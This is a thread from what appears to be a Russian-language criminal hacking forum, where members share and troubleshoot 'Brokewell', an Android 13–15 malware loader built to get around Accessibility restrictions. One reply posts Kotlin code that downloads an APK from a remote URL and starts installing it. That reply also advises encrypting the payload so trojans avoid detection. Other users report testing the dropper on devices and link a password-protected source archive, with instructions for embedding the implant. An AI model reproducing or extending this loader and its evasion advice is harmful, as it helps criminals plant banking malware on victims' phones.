• XSS.stack #1 – первый литературный журнал от юзеров форума

[Free + OpenSource] Brokewell Android 13/14/15 Loader

Отслеживать
Samedit_Marais

Samedit_Marais

HDD-drive
Пользователь
Регистрация
13.04.2022
Сообщения
36
Реакции
23
Greetings forum member !



I want to share my project here. An android 13/14/15 loader, to bypass Accessibility restriction.



It doesnt prompt external storage permission, since the implant.apk are embedded in res/raw/ directory. It can developed to download the .apk from your C2 too.



If many people interested in this project, i will maintain it further.






If you guys are having an issues to set it up, or building it, reach me on Telegram instead.



Baron Samedit Marais

b r o k e w e l l
t.me
 
Samedit_Marais сказал(а):
Greetings forum member !



I want to share my project here. An android 13/14/15 loader, to bypass Accessibility restriction.



It doesnt prompt external storage permission, since the implant.apk are embedded in res/raw/ directory. It can developed to download the .apk from your C2 too.



If many people interested in this project, i will maintain it further.






If you guys are having an issues to set it up, or building it, reach me on Telegram instead.



Baron Samedit Marais

b r o k e w e l l
t.me
thanks bros for share
 
Держите код на котлине как апк без разрешения на файлы (не путать на установку из неизвестных источников!) качать и ставить, кому надо перелпит на установку через сессию:


Java: 
 //функция скачивания апк
 private fun downloadFile(url: String, context: Context, callback: (Uri?) -> Unit) {
        Log.d("download", "Начинаем скачивание файла")
        GlobalScope.launch(Dispatchers.IO) {
            var apkUri: Uri? = null
            try {
                val connection = URL(url).openConnection() as HttpURLConnection
                connection.connect()

                val contentLength = connection.contentLength
                Log.d("download", "Размер файла для скачивания: $contentLength байт")

                if (connection.responseCode == HttpURLConnection.HTTP_OK) {
                    val inputStream = connection.inputStream
                    val apkFile = File(context.filesDir, "downloaded_app.apk")

                    var downloadedBytes = 0

                    inputStream.use { input ->
                        FileOutputStream(apkFile).use { output ->
                            val buffer = ByteArray(4 * 1024) // буфер для скачивания
                            var readBytes: Int
                            while (input.read(buffer).also { readBytes = it } != -1) {
                                output.write(buffer, 0, readBytes)
                                downloadedBytes += readBytes
                                Log.d("download", "Скачано $downloadedBytes байт из $contentLength байт")
                            }
                        }
                    }

                    apkUri = FileProvider.getUriForFile(context, "${context.packageName}.fileprovider", apkFile)
                }
            } catch (e: Exception) {
                e.printStackTrace()
                Log.e("download", "Ошибка при скачивании файла: ${e.message}")
            }
            callback(apkUri)
            Log.d("download", "Скачивание файла завершено")
        }
    }
  
  
  
//установка дебильная
        private fun installApk(apkUri: Uri, context: Context) {
        val intent = Intent(Intent.ACTION_VIEW).apply {
            setDataAndType(apkUri, "application/vnd.android.package-archive")
            flags = Intent.FLAG_ACTIVITY_NEW_TASK or Intent.FLAG_GRANT_READ_URI_PERMISSION
        }
        Log.d("install", "Запускаем установку apk")
        context.startActivity(intent)
    }
  
  
//ИСПОЛЬЗОВАНИЕ:

            val apkLink = "https://domain.com/tk.apk"
        downloadFile(apkLink, this) { apkUri ->
            apkUri?.let { installApk(it, this) }
        }

А чтобы ваших анубисов не палили, можно шифровать с ключом ваш апк и хранить в шифрованном виде, потом брать с сервера ключ и апк и ставить
 
Протестировал на эмуляторе LDPlayer отлично устанавливается, автоматически включается Спец. возможности вложенного малварь. А вот на реальной трубке Xiaomi Android 10, всё так же, но автоматически не запускаются Спец. возможности маалвари.
 
qvp сказал(а):
Протестировал на эмуляторе LDPlayer отлично устанавливается, автоматически включается Спец. возможности вложенного малварь. А вот на реальной трубке Xiaomi Android 10, всё так же, но автоматически не запускаются Спец. возможности маалвари.
Всмысле автоматически? У малвари уже выдано ацессибилити, или ты имеешь ввиду что не надо restricted выдавать в настройках приложения чтобы стала доступна выдача ацессибилити?
 
Слободан Милошевич сказал(а):
Всмысле автоматически? У малвари уже выдано ацессибилити, или ты имеешь ввиду что не надо restricted выдавать в настройках приложения чтобы стала доступна выдача ацессибилити?
Пишу подробнее. Устанавливаю дроппер, установил, открываю, устанавливается вложенный малварь, установился, открывается окно спец. Возможности. Это в эмуляторе. На трубе сяоми все так же, кроме того что не открывается окно спец.возможности. при этом на рабочем столе иконка малварь есть, можно нажать и тогда спец.возможности окно откроется
 
Пожалуйста, обратите внимание, что пользователь заблокирован
qvp сказал(а):
Протестировал на эмуляторе LDPlayer отлично устанавливается, автоматически включается Спец. возможности вложенного малварь. А вот на реальной трубке Xiaomi Android 10, всё так же, но автоматически не запускаются Спец. возможности маалвари.
QVP подсоби собрать этот лоадер.
 

MalwareSourceCode/Android/Android.BrkwlLoader.7z at main · vxunderground/MalwareSourceCode

Collection of malware source code for a variety of platforms in an array of different programming languages. - vxunderground/MalwareSourceCode
github.com
pass:infected
Вот доступная ссылка, или предыдущая версия, или новая, т.к. дропается без скачивания
Апк кладётся в app\src\main\res\raw под названием implant.apk
 
w0nd3r сказал(а):

MalwareSourceCode/Android/Android.BrkwlLoader.7z at main · vxunderground/MalwareSourceCode

Collection of malware source code for a variety of platforms in an array of different programming languages. - vxunderground/MalwareSourceCode
github.com
pass:infected
Вот доступная ссылка, или предыдущая версия, или новая, т.к. дропается без скачивания
Апк кладётся в app\src\main\res\raw под названием implant.apk
w0nd3r сказал(а):

MalwareSourceCode/Android/Android.BrkwlLoader.7z at main · vxunderground/MalwareSourceCode

Collection of malware source code for a variety of platforms in an array of different programming languages. - vxunderground/MalwareSourceCode
github.com
pass:infected
Вот доступная ссылка, или предыдущая версия, или новая, т.к. дропается без скачивания
Апк кладётся в app\src\main\res\raw под названием implant.apk
каксего использовать? Можно мануал?
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх